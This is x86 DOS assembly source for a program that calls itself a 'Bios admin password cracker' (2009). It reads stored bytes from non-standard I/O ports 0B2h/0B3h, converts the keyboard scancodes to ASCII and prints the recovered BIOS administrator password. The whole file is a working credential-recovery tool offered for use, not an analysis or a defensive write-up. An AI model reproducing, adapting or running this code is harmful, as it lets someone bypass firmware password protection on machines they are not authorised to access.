
	.386c
	.radix 16
	.model tiny


	seg_a		segment	byte public use16
			assume	cs:seg_a, ds:seg_a


			org	100h
	

	start:
			push cs
			push cs
			pop ds
			pop es
			mov	bx,offset keytable	; load keytable pointer -> store eeprom data there
			xor	ax,ax			; Zero register
			xor	si,si			; Zero register
			mov	al,1			; important, start at al=1
			call	sub_0003		; get all data from eeprom -> keytable
			
			mov	cx,10h			; translate from scancode to ascii
			
   			mov	si,offset keytable	; translate keytable
   			mov	bx,offset scan2ascii	
   			mov	di,offset asciitable 	; to asciitable
loc_0001:					
			mov	al,[si]			; get one byte from keytable
			xlat				; al=[al+[bx]] table -> translate to ascii
			mov	[di],al			; store one byte to asciitable
			inc	si			; inc counters
			inc	di
			dec	cl			; loop for 16 times
			jnz	loc_0001		; Jump if not zero
			
			nop				; insert int3 here
			nop
			nop
			
			call	sub_0001		; (0150)
loc_0002:
    			mov	ah,4Ch
			int	21h			; DOS Services  ah=function 4Ch
							;  terminate with al=return code


;                              SUBROUTINE


sub_0001	proc	near
			mov	ah,9
   			mov	dx,offset greetings	
			int	21h			; DOS Services  ah=function 09h
							;  display char string at ds:dx
			call	sub_0007		; prints scancode in hex 
			call	sub_0009		; print "Scancode 2 ascii" plus buffer with translation
			ret
			
sub_0001	endp


;                              SUBROUTINE


sub_0003	proc	near				; get all data from eeprom to [bx+0...15]
			push	cx			; bx pointer to keytable to store, al must be 1 
			push	si
			mov	ah,al
			mov	cx,0Fh
			xor	si,si			; Zero register
			jmp	short loc_0005		; 
loc_0004:					
			inc	ah			; ah MUST be inc'd ! 
			inc	si
loc_0005:					
			mov	al,ah
			call	sub_0004		; get one byte from eeprom
			and 	al, 07fh 		; only scancodes 0-128 needed
			mov	[bx+si],al		; store byte to table at [bx+0..15]
			inc	ax			; al must be incremented (? not sure)
			nop
			nop
			dec	cx
			jnz	loc_0004		; Jump if not zero
			pop	si
			pop	cx
			retn
sub_0003	endp



;                              SUBROUTINE


sub_0004	proc	near
			push	bx
			movzx	bx,al			; Mov w/zero extend
			add	bx,0CDh
			call	sub_0005		; prepare eeprom reading with OUT
			call	sub_0006		; get one byte from eeprom in al
			pop	bx
			and	al,7Fh			; and al byte with 7f 
			retn
sub_0004	endp


;                              SUBROUTINE


sub_0005	proc	near
			mov	al,bl
			out	0B3h,al			; port 0B3h ??i/o non-standard
			mov	al,60h			; '`'
			out	0B2h,al			; port 0B2h ??i/o non-standard
			out	84h,al			; port 84h, POST checkpoint
			mov	al,bh
			out	0B3h,al			; port 0B3h ??i/o non-standard
			mov	al,61h			; 'a'
			out	0B2h,al			; port 0B2h ??i/o non-standard
			out	84h,al			; port 84h, POST checkpoint
			retn
sub_0005	endp

;                              SUBROUTINE


sub_0006	proc	near
			push	dx
			mov	al,67h			; 'g'
			out	0B2h,al			; port 0B2h ??i/o non-standard
			out	84h,al			; port 84h, POST checkpoint
			in	al,0B3h			; port 0B3h ??i/o non-standard
			out	84h,al			; port 84h, POST checkpoint
			pop	dx
			retn
sub_0006	endp


;                              SUBROUTINE


sub_0007		proc	near			; prints whole keytable in hexadecimal bytes
			mov	dx,offset txt_scancodes	; but first print : "Scancode:" (here!)
			mov	ah,9
			int	21h			; display char string at ds:dx


    			mov	bx,offset keytable
			xor	si,si			; Zero register
loc_0006:					
			mov	al,[bx+si]		; get one byte from keytable
			cmp	al,0			; zero? quit
			je	short loc_0007		; Jump if equal
			call	sub_0008		; print one char in hexadecimal plus space
			inc	si
			jnz	loc_0006		; Jump if not zero
			retn
loc_0007:					
			retn
sub_0007	endp

;                              SUBROUTINE

sub_0008	proc	near				; prints one char in AL as hexadecimal, plus space
			push	bx
			push	ax
			push	ax
			and	al,0F0h
    			mov	bx,offset hextab	; bx = pointer to hextab	
			shr	al,4			; Shift w/zeros fill
			xlat				; al = char value of high nibble
			mov	dl,al			; print needs register DL with value
			mov	ah,6
			int	21h			; print high nibble
						
			pop	ax			; get al 
			and	al,0Fh			; get low nibble
			xlat				; al=char value of low nibble
			mov	dl,al			; print needs register DL with value
			mov	ah,6
			int	21h			; print low nibble
							
			mov	dl,20h			; ' '   (space char)
			mov	ah,6
			int	21h			; print space char in dl
			pop	ax
			pop	bx
			retn
sub_0008	endp




;                              SUBROUTINE


sub_0009	proc	near				; print text "scancode 2 ascii trans" plus acutal 
    			mov	dx,offset txt_scan2a	; translated scancode
			mov	ah,9
			int	21h			; display char string at ds:dx

    			mov	bx,offset asciitable	
	loc_0008:					
			mov	dl,[bx]
			cmp	dl,0
			je	short loc_0009		; end print if byte = 0
			mov	ah,6
			int	21h			; print 1 byte from ascii translated keytable
			inc	bx
			jnz	loc_0008		; Jump if not zero

			nop
			nop
	loc_0009:					
			mov	ah,6			; print 0d 0a = return
			mov	dl,0Dh
			int	21h			; DOS Services  ah=function 06h
			mov	ah,6
			mov	dl,0Ah
			int	21h			; DOS Services  ah=function 06h
							
			retn
sub_0009	endp


greetings		db	0Dh, 0Ah, 'Bios admin password cr'	
			db	'acker by Antirack/Digerati Jun-2'
			db	'009 ', 0Dh, 0Ah 
			db	'$'
			db	20 dup (0)

scan2ascii		db	0			
			db	' 1234567890-=', 8, 9, 'qwertyuio'
			db	'p[]', 0Dh, ' asdfghjkl;', 27h, '`'
			db	' \zxcvbnm,./ *               789'
			db	'-456+1230.'
			db	42 dup (0)
			
			
hextab   		db	'0123456789abcdef'	

	txt_scancodes   db      0Dh, 0Ah, 'Scancodes from EEPROM: $'
	txt_scan2a	db	0Dh, 0Ah, 'Scancode-to-ascii translation: $'
	keytable 	db	32 dup (0)			
	asciitable	db	32 dup (0)
			


	seg_a		ends

	end	start
